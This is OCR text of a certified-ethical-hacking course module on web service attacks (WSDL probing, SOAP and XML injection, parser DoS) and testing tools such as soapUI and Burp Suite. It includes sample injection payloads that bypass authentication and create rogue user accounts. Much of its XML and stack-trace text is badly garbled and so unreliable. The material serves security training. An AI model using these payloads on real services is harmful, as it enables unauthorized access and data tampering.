© In fo rm a tio n Leakage
© A p p lic a tio n Logic A ttacks
© D atabase A ttacks

Q DoS A ttacks
Database Attacks,
DoS Attacks
I n f o r m a t i o n L e a k a g e ,
A p p l i c a t i o n L o g ic A t t a c k s
WSDL Probing
Attacks
SOAP Injection,
XML Injection
Web Services
F I G U R E 1 3 . 5 2 : A t t a c k W e b S e r v i c e s

CEHUrtifwd ilhiul lUtbM
W eb Services Probing Attacks
6 Attacker then creates a set o f valid requests by selecting
a set o f operations, and form ulating the request
messages according to the rules o f the XML Schema th a t
can be subm itted to the web service
« Attacker uses these requests to include m alicious
contents in SOAP requests and analyzes errors to gain a
deeper understanding o f potential security weaknesses
‫ר‬6 In the firs t step, the attacker traps the WSDL
docum ent from web service traffic and analyzes it to
determ ine the purpose o f the application, functional
break dow n, entry points, and message types
9 These attacks w ork sim ilar to SQL injection attacks
<?>o:ml versions" 1,0" encoding‫־‬ "utf-8" ?>
- <soap: Envelope xmlns: soap‫"־‬http://schemas.xmlsoap.org/soap/ envelope/‫־‬
xmlns: xsi="http ://www .w3 .org/2001/XMLSchem ‫-־־‬instl'lnce "
xmlns: xsd='http://www .w3 .org/20DI/XMLSchemlT>
■<soap: Body>
• <soap:Fault>
<faultcode>soap:Server</faultcode>
<faultstring>System. Web .Services .Protocols .SoapException: tr w m i w t i • to
procat• request -> ryrtemOata.OUDb.OMDb*nceptlon Syntax •rror (milling operator) •nquwv t.prn•‫'׳־‬
productname Ilk• '‫־‬ and provlderld • '112 •111 -•941*. At
tyttem Data.OleDb.OleDbcommand liecutc(ommandTeatluarHand■ng
IMU hr) •t lystemData.OleDb.OleDbccmmandlnearteCommandtert>orSlngle«o«1Jt
liagOBTAftAMS dbfaramt. Obiectg, e«ea/teHeu>t) •t
system Data.OleOb.OleOOCommand(•ecule(ommandTrat|Ot>;cct&eaocut<*<et1/t) at System Data (*<06
CMObCemmand UeaiteCommand !Command Behavior beftavlor. Object* axactfafteiuN) at S*«wn Oata
OUOb CteObCo mm and. liKuKKe adcri ntcrna !(Command Behavior behavior. String methoe) at
Syftam.Oata.OMDb.OMObccn1mand.ixaa«teKeader|Con1mandBehBv1ar behavior) at
iystem Data.OleDkOleObcommandlaea/teKcader() at Pvoduet Mo. ProductOBAaess bet Produd
IrVarmatlonlStrlng productMame, Stringuld, String password) at
ProdjetlnfaPtoduclnfoXiatProdualnlormation&*Name(Siring name, String jd. Stnrg password) Ind 0‫׳‬
inner axctpoon stack trac —</faultstring>
<detail />
</soap: Fault>
</soap : Body>
</soap: Envelope>
Server thro w s
an erro r
<?xml verslon‫"־‬I.O- encoding‫־‬"UTF‫־‬S' standalone‫־‬ '
no* ?>
- <$QAP-ENV: Envelope )(mlns:
SOAPSOKl‫"־‬http://www.w3.org/2001/
XMLschcma'
xmlns: S0APSDK2‫"־‬http ://www .w3 .org/200
l/XMLSchem.o- Inst.once"
xmlns: S0APSDK3«"http://schemas .xmlso.op
.org/soap/ encoding/' xmlns: SOAPENV‫־‬
' http://schemas .xmlsoap .org/soap/ envelope/'>
• <SOAP- ENV Body •
- <SOAPSDK 4: GetProdUctlnformationByName
xmlns: SQAPSDK4■' http://s*austlap/Productlnfo/‘>
[<SQAPSDK4; name?■ ^SQAP3DK4; n a m d
<S0APSDK4: uid>312 ■111 -8S43</SOAPSDK4:uid>
<S0APSDK4: password> 5648</SOAPSDK4:
password>
</SOAPSDK 4: GetProduc t In forma ti 0 n B y Name>
</SOAP‫־‬ENV: Body •
</SOAPENV: Envelope>
v . - r : ur■•■.
A tta c k e r
Attacker inject
arbitrary character
(') in th e in put field
C o p y rig h t © b y EG-Gouacil.A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S tr ic tly P ro h ib ite d .
W e b S e r v i c e s P r o b i n g A t t a c k s
In th e firs t step, th e a tta c k e r tra p s th e WSDL d o c u m e n t fro m w e b service tra ffic and
analyzes it to d e te rm in e th e purpose o f th e a p p lic a tio n , fu n c tio n a l b re a kd o w n , e n try p oints,
and m essage types. These attacks w o rk sim ila rly to SQL in je c tio n a tta cks. The a tta c k e r th e n
creates a set o f valid requests by se le cting a set o f o p e ra tio n s, and fo rm u la tin g th e req ue st
m essages according to th e rules o f th e XM L Schem a th a t can be s u b m itte d to th e w eb service.
The a tta c k e r uses th ese requests to inclu de m alicious c o n te n t in SOAP requests and analyzes
e rro rs to gain a d e e p e r u nd e rsta n d in g o f p o te n tia l se cu rity w eaknesses.
<?>o:ml version‫־‬ " I, O" encoding‫־‬ "utf-8" 1>
■<soap: Envelope xmlns: soap='http://schemas.xmlsoap.org/&oap/ envelope/"
xmlns: xsi="http://w w w .w3 .org/2001/XMLSchem~- instl'lnce "
xmlns: xsd='hup://www .w3 .org/200 l/XMLSchemlT>
• <soap: Body>
•<soap:Fault>
<fauKcode>soap:Server</faultcode>
<fauhstring>System. Web .Services .Protocols .SoapException: ‫׳‬v^A^unahi.'-o
process request —•1y5tem.Dale.OleOb.CXeObCxception:Syntaxerror ImissincoperatorIinqueryu p m m
productnamelike “and providerid-'312 -111 8543".At
sy(tenvData.O4eDb.Qle0bconvnand.Executc(ommandTextErR>rHandling
11nt32hr)at »ystern•Data.CMeOto.OleOtxomrrand.ExecuteCommindTeMtFoiSintfeReuill
ItagDSPARAMSdbParam?,Objectsexeci*eKesuft)at
sy*trm_D«fa.OIeDb.QUCbcomniandfxecutrCorrmandTart(Objrtt&mrcutpftnult)at Sy»tem.DataHleOfe
OteCXjCommiod.ExecuteCommind(CommandBehavior behdvioi.Objects exauttfteMlt)4t SystemData
.0*roh .OlcDbCommand. txecuteneoderintc maI(commandBehaviorbchavior,Stringm<‫־‬t hod)at
System.Oats.(JleOb.deDtxonwTwindtxn 11H rsdn(( aniniflndRdiaviorbehavior)at
S'nt«mi>atd.Ol«ObXlleOtx«11*11<1r1dExk;1uteRc^dudat Pioduct Info.ProdwUOSAuiL-u•QetPiodwct
informatioo|striflgprodu<tNamcvstrinjuld,Stringpassword)at
P'0d1Ktlnfc.PTuduclnl<xCetP10duc(ln(urn«tianBYN«1n^StrinRname,$t(1n« u»d,StringpaMMreid)—Cndol
innerMcepttonstadctrar- —</faultSthng>
<detail />
</soap: Fault>
</soap : Body>
</30jp: Envelope-'
S e r v e r t h r o w s
a n e r r o r
<?xml version1.0"‫־‬• encoding‫־‬ 'U TF-S' standalone‫־‬
no' ?>
• <SOAP*ENV: Envelope )(mlns:
SOAPSDKl="http://www.w3.org/2001/
XMLschema'
xmlns: SOAPSDK2="http ://w w w .w3 .org/200
l/XMLSchem.o- inst.once"
xmlns: SOAPSDK3="http://schemas .xmlso.op
.org/soap/ encoding/' xmlns: SOAPENV‫־‬
‘ http://schemas .xmlsoap .org/soap/ envelope/'*
- <SOAP- ENV:Body>
- <SOAPSOK4: GetProdUctlnformationByName
xmlns: SOAPSDK4=' 1 ‫י‬/0^1^1^0^ ^51‫ו‬81‫ו‬ ^ : / ^ >
kS0APSDK4: name> </S0APSDK4:namel
<SOAPSOK4: uld>312 - 111 - 8543</SOAPSDK4: uid>
<S0APSDK4: password* 5648</SOAP$DK4:
pa39word>
</SOAPSDK 4: GetProduc t In forma tiO nB y Name>
</SOAP‫־‬ENV: Body>
</SOAP‫־‬ENV: Envelope*
Attacker
•<............‫•־‬
Attacker inject
arbitrary character
(') in the input field
F I G U R E 1 3 . 5 3 : W e b S e r v i c e s P r o b i n g A t t a c k s
M odule 13 Page 1899 Ethical Hacking and C ounterm easures Copyright © by EC-C0l1nCil

Web Service Attacks: SOAP
Injection
J A t t a c k e r i n j e c t s m a l i c i o u s q u e r y s t r i n g s i n t h e u s e r i n p u t f i e l d t o b y p a s s w e b s e r v i c e s
a u t h e n t i c a t i o n m e c h a n i s m s a n d a c c e s s b a c k e n d d a t a b a s e s
J T h i s a t t a c k w o r k s s i m i l a r l y t o S Q L I n j e c t i o n a t t a c k s
Server Response
0 d ) ®
< ? x m l v e r s i o n “ " 1 . 0 ‫״‬ e n c o d i n g = " u t f - 8 ' ?>
- < s o ^ > : E n v e lo p e x m ln s : s o a p = ' , h t t p : / / s c h e m a s
. x m ls o a p . o r g / s o a p / e n v e lo p e / "
x m ln s : x s i —' h t t p : / /w w w . w3 . o rg /2 0 0 1 /X M L S c h e m a -
in s t a n c e '
x m ln s : x s d ■ 'h t t p : //w w w . w 3 . o r g / 2 0 0 1 / XM LSchem a '>
- < s o a p :B o d y >
- < G e tP r o d u c tln fo r m a tio n B y N a m e R e s p o n s e
x m ln s ‫״‬ " h t t p : / / j u g g y b o y / P r o d u c t I n f o / <‫״‬
‫־‬ < G e tP r o d u c tln fo r m a tio n B y N a m e R e s u lt>
< p r o d u c t id > 2 5 < / p r o d u c t ! d >
< p r o d u c t Name > P a in t in g l0 1 < / p r o d u c t N a m e >
< p r o d u c t Q u a n t it y > 3 < / p r o d u c t Q u a n t it y >
< p r o d u c t P r ic e > 1 5 0 0 < / p r o d u c t P r ic e >
< / G e t P r o d u c t ln f o r m a tio n B y N a m e R e s u lt>
< /G e t P r o d u c t l n f o rm a tio n B y N a m e R e s p o n s e >
< / s o ^ > : B o d y >
< /s o a p : E n v e lo p e >
O O h ttp ://ju g g y b o y .c o m /w s /p ro d u c ts .a s m x
Account Login
Username f %
Password [ o n
1.0 ine«d1B9■ 'UTF-0' standaloo•■ '##"?>
pe xnilns SO A PCD K l-http //wvw v) . or«/2001/XHLScb«i
h ttp //WWW w3 © rg/2001/ XMLGchar* • in sta o c e
h ttp : //sch c sM : . xb1:o«p . o tf /s o tp /iB e e d io ( / ' u l a i
<?ul T«r: 10a■
- <SQk?-DIV:tav<
alas: SQAPS0X2‫׳‬
als: S0APSDK3‫׳‬
llf/iOip lenvclopcl ’>SOAPEKV- http://:ebcB«:
- <S0AP-DfV Body
- <2QA?SDX4 G«tProductlnfonmtionByNftoe
a l a : : SQAPSDX4*' http // }uggyboy/ProductInfo /'>
<20APSDK4: name .►% </S0APSDK4 : name>
<20APSDK4: u1d>312 - 111 - 854 3</SQAPSDK4 : m d >
<£0APSDK4: pa::word> Or 1= 1 Or blah = 1</S0APS0K4 : pas
</S0APS0K 4 GetfrodnctlnforaitiooByNwo c/SOAP-EKV Body:•
</S0AP- OT/ : Envelope*
W e b S e r v i c e A t t a c k s : S O A P I n j e c t i o n
Sim ple O b ject Access P rotocol (SOAP) is a lig h tw e ig h t and sim ple XM L-based p ro to c o l
th a t is designed to exchange s tru c tu re d and ty p e in fo rm a tio n on th e w eb . The XM L envelope
e le m e n t is alw ays th e ro o t e le m e n t o f th e SOAP m essage in th e X M L schem a. The a tta cke r
inje cts m alicious q u e ry strings in th e user in p u t fie ld to bypass w e b services a u th e n tic a tio n
m echanism s and access backend databases. This a tta ck w orks sim ila rly to SQL in je c tio n attacks.
Server Response
< ? x m l v e r s i o n = " l . 0 " e n c o d i n g = " u t f - 8 ' ? >
- < s o a p : E n v e lo p e x m ln s : s o a p = ‫י‬ ' h t t p : / / s c h e m a s
. x m l s o a p . o r g / s o a p / e n v e l o p e / "
x m ln s : x s i = ' h t t p : / / w w w .w 3 . o r g / 2 0 0 1 /X M L S c h e m a -
i n s t a n c e '
x m l n s : x s d = ‫׳‬ h t t p : //w w w . w 3 .o r g / 2 0 0 1 / X M L S c h e m a '>
- < s o a p : B o d y >
- < G e t P r o d u c t I n f o r m a t io n B y N a m e R e s p o n s e
x m ln s = " h t t p : / / j u g g y b o y / P r o d u c t I n f o / " >
- < G e t P r o d u c t I n f o r m a t io n B y N a m e R e s u it >
< p r o d u c t i d > 2 5 < / p r o d u c t i d >
< p r o d u c t N am e > P a in t in g l0 1 < / p r o d u c t N a m e >
< p r o d u c t Q u a n t i t y > 3 < / p r o d u c t Q u a n t i t y >
< p r o d u c t P r i c e > 1 5 0 0 < / p r o d u c t P r i c e >
< / G e t P r o d u c t ln f o r m a t io n B y N a m e R e s u lt >
< / G e t P r o d u c t ln f o r m a t io n B y N a m e R e s p o n s e >
< / s o a p : B o d y >
< / c o a p : E n v e lo p e >
Q © http://iuggyboycom/ws/products.asmx
A ccount Login
‫ב‬ ‫כ‬ > ■U s e r n a m e f %
Password ^ o r 1 1 ‫־‬ orb b h SLbni:
<?xk1 v e r s i o n - ' 1 .0 ' e n c o d in g - U T r-8 ' s t a n d a l o n e - 'n o " ? >
- <S 0A P-BN V :Envelope x m ln s: SOAPSDKl-'‫־‬h ttp ://w w w .w 3 .o rg /2 0 0 l/* M L S c h e1
m i n i : SOAPSDK2— ' http ://www. w3 .org/ 2001/ XMLSchema - inatance'
xalm: SOAPSDK3=' http://sche1aas.xa11a0ap.org/90ap/enc0ding/' xalna:
SOAPEKV-•h t t p : //* c h e * 1ds .xjal8 0 a p .0 rg /8 0 a p J e n v e lo p e J r>
<S0AP-BNV:B0dy>
- < S O A P SD K 4:O etP rodoctlnfor«otionB yN nm e
n l n s : S0APSDK4—' h t t p : / / ju g g y b o y /P r o d u c tln fo / ' >
<SOAPSDK4 naae>% </SOAPSDK4: name>
<S0A?SBK4: uld>312 - 111 - 8543</SOAPSDK4: uld>
<SOAPSDK4: paaaword>' Or 1* 1 Or blah ■ </SOAPSDK4: paaaword>
</SOAPSDK 4: cotProdactlnformatlonByNamo> </SOAP ENV:B0dy>
<JSOAP BNV : Envoiopo>
FIGURE 1 3 .5 4 : SOAP In jectio n
Ethical Hacking and C ounterm easures Copyright © by EC-C0l1nCil
M odule IB Page 1900

CEH
Web Service Attacks: X M L
Injection
A t t a c k e r s i n j e c t X M L d a t a a n d t a g s i n t o u s e r i n p u t f i e l d s t o m a n i p u l a t e X M L s c h e m a o r p o p u l a t e
X M L d a t a b a s e w i t h b o g u s e n t r i e s
X M L i n j e c t i o n c a n b e u s e d t o b y p a s s a u t h o r i z a t i o n , e s c a l a t e p r i v i l e g e s , a n d g e n e r a t e w e b s e r v i c e s
D o S a t t a c k s
S e r v e r S i d e C o d e
<?xm l v e r s i o n 1 . 0 " ‫־‬ " e n c o d in g ‫־‬ "IS O -8 8 5 9 -!" ? >
•cuser s>
< u s e r>
<u sem am e > g a n d a l f < /u sernam e>
< passw ord> ‫י‬ c 3 < /p a ssw o rd >
< u s e rid > l0 1 < /u s e rid >
<ma1 1 > g a n d a lf 0 n u d d le e a r t h . ccnK /m a il>
< /u s e r>
< u s e r>
<u s e m a n e >Mark < / u s e r name>
< p a s s w o rd > l2 3 45</passw o rd>
< u s e rid > l0 2 < /u s e rid >
< m a il> g a n d a lf (? m id d le e a rth . c o trK /m a il>
J < u se r>
■ <u s e m ame>j as on< /u s e m am e>
■ < p a ssw o rd > a ttc)c< /p a ssw o rd >
C re a te s n e w
■ < u s e rid > 1 0 5 < /u s e rid >
o n th e s e r v e r■ < m a il> ja s o n @ ju g g y b o y •c o n K /m a il>
■ < ^u s e r>
< /u s e rs >
http://juggyboy.com/ws/login.asmx
S u b m it
mark@certifiedhacker.com</mail> </user>
<u$er> <username>Jason</usemame>
<password>attack</password>
<userid>105</useridxmail>jason (Sjuggyboy.com
C o p y rig h t © b y E C -G a u a ctl. A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S tr ic tly P ro h ib ite d .
W e b S e r v i c e A t t a c k s : X M L I n j e c t i o n
The process in w hich th e a tta c k e r e n te rs values th a t q u e ry XM L w ith values th a t take
advantage o f e xp lo its is kn ow n as an XM L in je c tio n atta ck. A tta c k e rs in je c t X M L data and tags
in to user in p u t fie ld s to m a n ip u la te XM L schem a o r p o p u la te XM L database w ith bogus e ntries.
XM L in je c tio n can be used to bypass a u th o riz a tio n , escalate privileges, and gen erate w eb
services DoS attacks.
S e r v e r S i d e C o d e
C re a te s n e w
u s e r a c c o u n t
o n t h e s e r v e r
< ? x n l v e rs io n ■ 1 . 0 *‫"׳‬ e n c o d i n g - ' I S O ‫־‬8859‫־‬ l " ? >
< u s « rs >
< u s * r >
< u s • r n M M > g a n d a 1£*< / u s « r n « n • >
< p a s3 w o rd > ! a 3 < /p a ssw o rd >
< u s e r id > 1 0 1 < / u s « r id >
< r‫־‬. a il > g a n d a l f ■ 'r .id d le e a r th . c o m < /r‫־‬. a il >
< / u s e r >
< u s « r>
< userna!ne>M ar]c</userna1ne>
< p » 3 3 w 0 rd > 1 2 3 4 5 < /p a 3 3 v 7 0 rd >
< u s e r id > 1 0 2 < / u s e r id >
< r 1 a il> g a n d a l£ 3 m id d l« « a r t h . c o m < /m a il>
< /u s « r>
J ^user5■ •
I <ua*rna.*n#> ja s o n < /u s « rn a m e > ;
I <pas3word>attck</pa3sword> !
| < u s e rid > 1 0 5 < /u s « rid >
■ < m a !l> ja s o n t" ju g g y b o y . oo m < /m » il> ■
• < /u 3 * r>
< /u 1 « r ! >
o o http://j1Jggyboy.com/ws/10gin.asmx
Account Login
Username Mark
Password 12345
E-mail
A
a il
mark@ >certifiedhacker.com</mailx/user>
<user> <username>Jason</username>
<password>attack</password>
<userid>105</useridxmail>jason@>juggyboy.com
FIGURE 1 3 .5 5 : XML In jectio n

Web Services Parsing Attacks CEH
B P a r s i n g a t t a c k s e x p l o i t v u l n e r a b i l i t i e s a n d w e a k n e s s e s i n t h e p r o c e s s i n g c a p a b i l i t i e s o f t h e X M L
p a r s e r t o c r e a t e a d e n i a l - o f - s e r v i c e a t t a c k o r g e n e r a t e l o g i c a l e r r o r s i n w e b s e r v i c e r e q u e s t
p r o c e s s i n g
A t t a c k e r s s e n d a p a y l o a d t h a t i s
e x c e s s i v e l y l a r g e t o c o n s u m e a l l s y s t e m s
r e s o u r c e s r e n d e r i n g w e b s e r v i c e s
i n a c c e s s i b l e t o o t h e r l e g i t i m a t e u s e r s
A t t a c k e r q u e r i e s f o r w e b s e r v i c e s w i t h a
g r a m m a t i c a l l y c o r r e c t S O A P d o c u m e n t t h a t
c o n t a i n s i n f i n i t e p r o c e s s i n g l o o p s r e s u l t i n g
i n e x h a u s t i o n o f X M L p a r s e r a n d C P U
r e s o u r c e s
W e b S e r v i c e s P a r s i n g A t t a c k s
A parsing a tta ck takes place w he n an a tta c k e r succeeds in m o d ify in g th e file re q u e st or
string . The a tta c k e r changes th e values by su p e rim p o sin g one o r m ore o p e ra tin g system
co m m an ds via th e request. Parsing is possible w h e n th e a tta c k e r executes th e .b at (batch) or
.cm d (com m a nd ) files. Parsing a ttacks e x p lo it v u ln e ra b ilitie s and w eaknesses in th e processing
ca p a b ilitie s o f th e X M L p a rse r to crea te a d e n ia l-o f-se rvice a tta ck o r g en erate logical e rro rs in
w e b service re q u e st processing.
R e c u r s i v e P a y l o a d s
XM L can easily nest or arrange th e e le m e n ts w ith in th e single d o c u m e n t to address
th e co m p le x re la tio n sh ip s. An a tta c k e r queries fo r w e b services w ith a g ra m m a tic a lly
c o rre c t SOAP d o c u m e n t th a t co nta ins in fin ite processing loo ps re su ltin g in exha ustio n o f X M L
p arser and CPU resources.
O v e r s i z e P a y l o a d s
In these payloads, XM L is re la tiv e ly verbose and p o te n tia lly large files are alw ays in to
th e co n sid e ra tio n o f p ro te c tin g th e in fra s tru c tu re . P rogram m ers w ill lim it th e d o c u m e n t's size.
A tta cke rs send a payload th a t is excessively large to consum e all system resources, re n d e rin g
w e b services inaccessible to o th e r le g itim a te users.

Web Service Attack Tool: soapUI
s o a p U I is a o p e n s o u r c e
f u n c t i o n a l t e s t i n g t o o l , m a i n l y
u s e d f o r w e b s e r v i c e t e s t i n g
I t s u p p o r t s m u l t i p l e p r o t o c o l s
s u c h a s S O A P , R E S T , H T T P , J M S ,
A M F , a n d J D B C
A t t a c k e r c a n u s e t h i s t o o l t o
c a r r y o u t w e b s e r v i c e s p r o b i n g ,
S O A P i n j e c t i o n , X M L i n j e c t i o n ,
a n d w e b s e r v ic e s p a r s in g
a t t a c k s
C o p y rig h t © by EC-Cauactl. A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S tr ic tly P ro h ib ite d
W e b S e r v i c e A t t a c k T o o l : s o a p U I
T Source: http://w w w .soapui.org
soapUI is an open source fu n c tio n a l te s tin g to o l, m a in ly used fo r w eb service te stin g . It su p p o rts
m u ltip le p ro to co ls such as SOAP, REST, HTTP, JMS, A M F , and JDBC. It enables you to create
advanced p e rfo rm a n ce rests ve ry q u ickly and run a u to m a te d fu n c tio n a l tests. W ith th e help o f
th is to o l, a tta ckers can easily p e rfo rm w e b services p ro bin g, SOAP in je c tio n , XM L in je c tio n , and
w e b services parsing attacks.

1- 1‫״‬ msoaplll 451
M&
Sd ₪I SamplcSc1-viccSo,1pBindng
©
'Overvie/v 'ServiceEncpwntsWSD1Cement WS-lConplaxe|
‫.י‬ m ♦0
x sample-serke./.-sd ‫ן‬
flb:C:lM$0sVUft1t1isi,d:a Vodpd-TutoriabWSd-WAO. vice./vsd
1: 3earchRespor.3e ,*/>
►S
<vsdl :sessaae na1»="3ear2hre3pcn3e">
<v‫־‬a i:par- na1g=3‫־‬ear^&re3ulf‫־‬ eienenc=
< /w sd l :n c :3 a jc >
<vsdl:1ne35age nan6="buySe<1ue3t">
<vsdl:par- r-a2se=“3ess10nd* type=”xsci:string"/>
< v - d l.p a z s n n i r - **buyasrijig" t-ypc—’’x=<i. 3t u in g ”/ >
<,■vsdl :n a c B a jo
<vsdl:2ressaaa na!1e="busRespoase">
■cwsdl.pars naue=‫־‬buyrasuls‫־‬ elenen^=”tna:PuyRespoase”/^
< /v 9 d l:m e :3 a ;e >
<vsdl ‫־‬tn“§5aa® naT¥*="Login_fa‫־‬jltM3g">
<v=dl:par‫ם‬ nane="loginFault" cype=*xsd:string"/>
i/w s d l.a e :3 a je >
‫׳‬a d l- m ic a ^ • nane= " lo g o u t_ f JultM «g">
< v s d l:p a rt r^ x a = " Io q o J tia u lt'* typ-3="x3d: s tr in g V >
l±> C_l Comdex Type
© ‫ט‬ Arony‫־‬nous C|~
© CD Global □encn
© C3 Schemas
0 ‫&״‬ Messages
y £7■ buyReque
j j••‫□״‬ part:
5 Q port: J
© C3 bu/Respc I
© C 3 buy_fadt I
: IhdboirRea
mCabgirRespJ
Q&bgin_f0jlII
* □ part:p
©••CD bg0jtR.ec
© O booutRes
ih C□ bcojt fa
© C3 searchRe
pa l;<^1tty://A‫־‬ww.cxa11plc.otg/>ertulc/
= * look Q#sktop U#lp
1vD<3 0 4 C ? * o
[IP Projects
B 1 sample-service
3 I SarrpfeServceSod[
® •£ buy
L ‫ע‬ Request 1
Recuest PrppefOes
Property J 1/alue ‫ך‬
b P,‫״־‬
Request 1 1-
1Messaoe 5ize 277
inocing UTF-8
Encboirt
3nc Address
http://ww...
‫־‬oflov‫׳‬ Rcdi... true
Jserane
-,assv'0'd
>xnan
Autncntica...
*ftSS^ass...
W55 rmeT...
SSLKeyatore
Global HTT...
SlopSOAP ... fake
EnaDle M7CW false
rwteMTOM fol»c
I Hire Rcep... false
txpandMT .. false
bodbe axil... (rue
EnoxScAet... false
FrwrtU ’nln falc# ‫׳‬
Properfc#e
F I G U R E 1 3 . 5 6 : s o a p U l T o o l S c r e e n s h o t

Web Service Attack Tool: XMLSpy C EH
j A ltova XMl Spy
‫׳‬Fic E it Frcject >M- DTDfSchcmo Cchcrno design XSLJXQucry Authentic Convert View Ercwso:
WSDL SOAP Tools Window Help:
a j 1 ^ i p i i a i n i g i B ■ ! r , W H f f ii l F b- ‫׳‬ ,1 2a i a . a
-&00jg 1>■ ft, [^<s- <yB ! y‫.כ‬;
ncyR 3 XSL O u tp u t, htm t
A T h e
‫־‬ P e rs o n n
F irs t N a ir n
‫ד‬‫פ‬
Ksi:fot‫־‬eachse1ect="
n1:Firs1Name">
> I I i i I 1 I ‫י‬
span style-'color:navy:
font-famity:Arial;
font• size :12pt;
font-we1ahtbold;">
II II:III <«cj:‫ג‬ ppV-tompialo ‫•י/ס‬
«pan>
httpTVivsw'AS orgf20
m/XML£cnerria-1nsta
nee‫־‬
xslscnenraLocation
http/xm s 3y.neVager
c/fschemastoersonn
el
C:rneAaemvx$d'>
-P cioo ra D oio-
1<
NiM^/FirstNJarr1«s►
j < lastN am e»
0evgood«f
Dccunrnt
X Call Stack
| V<lu» / Atlrih N»<n»____
Q 'h * A * n c >«3 © A q e n ts
xsl:rcr-eech TheAgencyR3.xsf Tertiporarr Re$»*
xsl:fo‫־־‬eo=h Thc.AgcncyR3.x5H Temporary Res‫׳‬ _
vsl:f<y-*!ch Th*A{jf>nryR3 *«H TMpor»rvR«1
xsl:for-ea:h TheAgencyR3.xsH Temporary Res!
v | kocty Thc.AgcncyR3.xiH Tcnpwar/Rc5< v
Call Stack Templates Into Messaoes Trace
Elcniat
Oamert
lerf
Etoner*
tJ ( ) Per vjt aDato
tl () ‫״‬lrsNane
0 () -ostMoire
ra () H e ElOTtcr*
Concert Varables <FattvWatah
h ttp ://w w w . altova.com
A l t o v a X M L S p y i s t h e X M L e d i t o r a n d
d e v e l o p m e n t e n v i r o n m e n t f o r
m o d e l i n g , e d i t i n g , t r a n s f o r m i n g , a n d
d e b u g g i n g X M L - r e l a t e d t e c h n o l o g i e s
C o p y rig h t © b y E C -C a u a ctl. A ll R ig h ts R e s e rv e d . R e p ro d u c tio n is S tr ic tly P ro h ib ite d .
W e b S e r v i c e A t t a c k T o o l : X M L S p y
^ 2 Source: h ttp ://w w w .a lto v a .c o m
A lto va XM LSpy is th e XM L e d ito r and d e v e lo p m e n t e n v iro n m e n t fo r m o d e lin g , e d itin g ,
tra n s fo rm in g , and debugging X M L -rela ted te chn olo gie s. It o ffe rs g ra p h ica l schem a d esign er,
S m art Fix v a lid a tio n , a code g e n e ra to r, file co nve rte rs, debuggers, p ro file rs , fu ll database
in te g ra tio n , and s u p p o rt fo r WSDL, SOAP, XSLT, XPath, XQ uery, XBRL, and O pen XM L
d o cu m e nts, plus Visual S tudio and Eclipse plug-ins, and m ore.

□ ( s J S 1IAltova XMLSpy
i File Edit Project XML DTD/Schema Schema design XSL/XQuery Authentic Convert View Browser
i WSDL SOAP Tools Window Help
I D I H j 0 1 # U U j B l l i B i I? I r a j f
‫ם‬‫טט‬‫ם‬ ‫ט‬‫ם‬
The
- Personn
F i r s t N a m e :
x s l : t e x t >
< / s p a n >
x s l : f o r - e a c h s e l e c t = "
n 1 : F i r s t N a m e " >
s p a n s t y l e = " c o l o r : n a v y ;
f o n t ‫־‬ f a m i l y : A r i a l ;
f o n t ‫־‬ s i z e : 1 2 p t;
f o n t - w e i g h t : b o l d ; * >
x s i : a p p l y - t e m p l a t e s / >
- s p a n >
I I I I I I
<t
3 3
3 4
h t t p :11w w w . w 3 . o r g / 2 0
0 1 / X M L S c h e m a - i n s t a
n e e "
x s i : s c h e m a L o c a t i o n
h t t p :/f x m l s p y . n e t / a g e n
c y / s c h e m a s / p e r s o n n
e l
C : V T h e A g e n c y . x s d " >
m < P e r s o n a l D a t a >
N i k i < / F i r s t N a m e >
] < L a s t N a m e >
D e v g o o d < /
Result Document
frni TheAgencyR3 Q A g e n ts @ X S L Output.html
I Location
X Call Stack
IValue / Attrib.. NameI Type
Context
Name
TheAgencyR3.xslt Temporary Res! /v
Temporary Res!
Temporary Resi
Temporary Res!
Temporary Res!
TheAgencyR3.xslt
TheAgencyR3.xslt
TheAgencyR3.xslt
TheAgencyR3.xslt
* xsl:for-each
xsl:for-each
= xsl:for-each
xsl:for-each
v body
n
Element
Element
NikiText
Call Stack Templates Info Messages Trace
NUMLn 5, Col 19
E) <> PersonalData
□) {FirstName
!—Hx
LastName><‫ש‬
l+l O Title Element
Context Variables XPath-Watch
Step Into
Element
FIGURE 13.57: XMLSpy Tool Screenshot

‫־‬ ‫־‬ ^ M o d u l e F l o w
So fa r, w e have discussed w e b a p p lica tio n concepts, th re a ts associated w ith w eb
a p p lica tio n , and th e hacking m e th o d o lo g y . N ow w e w ill discuss hacking to ols. These to o ls help
a tta ckers in re trie v in g sensitive in fo rm a tio n and also to c ra ft and send m alicious packets or
requests to th e v ic tim . W eb a p p lica tio n hacking to o ls are especially designed fo r id e n tify in g th e
v u ln e ra b ilitie s in th e w e b a p p lica tio n . W ith th e help o f these to ols, th e a tta c k e r can easily
e x p lo it th e id e n tifie d v u ln e ra b ilitie s and ca rry o u t w e b a p p lic a tio n a tta cks.
^ W e b A p p Pen T estin g W e b A p p C oncepts
^ S e cu rity Tools W e b A p p T h re a ts
C o u n te rm e a su re s fs=9 H acking M e th o d o lo g y
S b )
‫ץ‬ W e b A p p lic a tio n H acking Tools
•^‫-י־‬

This section lists and describes va riou s w e b a p p lic a tio n hacking to o ls such as Burp Suite
P rofessional, C ookieD igger, W ebS carab, and so on.

Web Application Hacking Tool:
Burp Suite Professional
Source: h ttp ://w w w .p o rts w ig g e r.n e t
Burp Suite is an in te g ra te d p la tfo rm fo r p e rfo rm in g se cu rity te s tin g o f w e b a p p lica tio n s. Its
va riou s to o ls w o rk to g e th e r to s u p p o rt th e e n tire te s tin g process, fro m in itia l m ap pin g and
analysis o f an a p p lic a tio n 's a tta ck surface, th ro u g h to fin d in g and e x p lo itin g s e c u rity
v u ln e ra b ilitie s . Burp Suite co nta ins key co m p o n e n ts such as an in te rc e p tin g proxy, a p p lic a tio n -
aw are spider, advanced w e b a p p lica tio n scanner, in tru d e r to o l, re p e a te r to o l, sequencer to o l,
etc.

in tru d e r a ttack 1
r« a c *rtowvtg 1H* • ‫*וזז‬
‫׳‬•lull* target positor* | pajloads
request position pajfoad | *talus error 6me leng* comment
*0 1 ^ ■ ]200 10443
I
s
1 We‫ס‬Service AitacK 400 193
2 we ‫ס‬SeMce *itac* 200 10443
request response
raw p3tarr headers he!
l o r r /th?id«1.4S07UlSOO48223lCpld•!. 1 HTTP/1 . 1
Host: t34.an.b1ng.net
